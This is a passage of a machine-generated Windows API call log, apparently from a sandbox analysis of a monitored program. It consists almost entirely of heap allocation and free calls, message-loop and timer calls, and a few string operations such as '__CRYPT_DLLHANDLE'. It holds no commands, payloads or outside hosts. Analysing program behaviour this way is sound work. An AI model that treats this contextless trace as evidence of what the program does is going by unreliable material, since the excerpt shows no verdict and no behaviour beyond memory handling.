hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0156.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0156.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0156.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0156.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0156.825] CharLowerBuffW (in: lpsz="byte[42368]", cchLength=0xb | out: lpsz="byte[42368]") returned 0xb [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0157.067] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0157.067] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0157.067] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0157.067] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0157.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0157.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0157.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f3d630 [0157.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2e80330 [0157.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d630 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0157.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0157.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0157.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0157.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0157.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0157.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f3d630 [0157.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d630 | out: hHeap=0x970000) returned 1 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0157.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0157.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) 